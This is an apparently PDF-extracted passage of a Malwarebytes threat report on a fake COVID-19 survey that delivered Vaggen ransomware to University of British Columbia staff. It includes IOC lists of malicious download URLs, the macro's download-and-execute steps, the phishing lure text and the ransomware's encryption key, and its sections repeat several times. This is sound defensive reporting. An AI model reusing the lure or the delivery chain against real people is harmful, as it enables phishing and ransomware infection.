3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1794 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1795 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1796 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1797 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1798 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1799 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1800 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1801 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1802 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1803 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1804 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1805 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1806 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1807 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1808 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1809 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1810 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1811 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1812 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1813 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1814 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1815 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1816 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1817 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1818 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1819 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1820 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1821 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1822 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1823 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1824 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1825 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1826 of 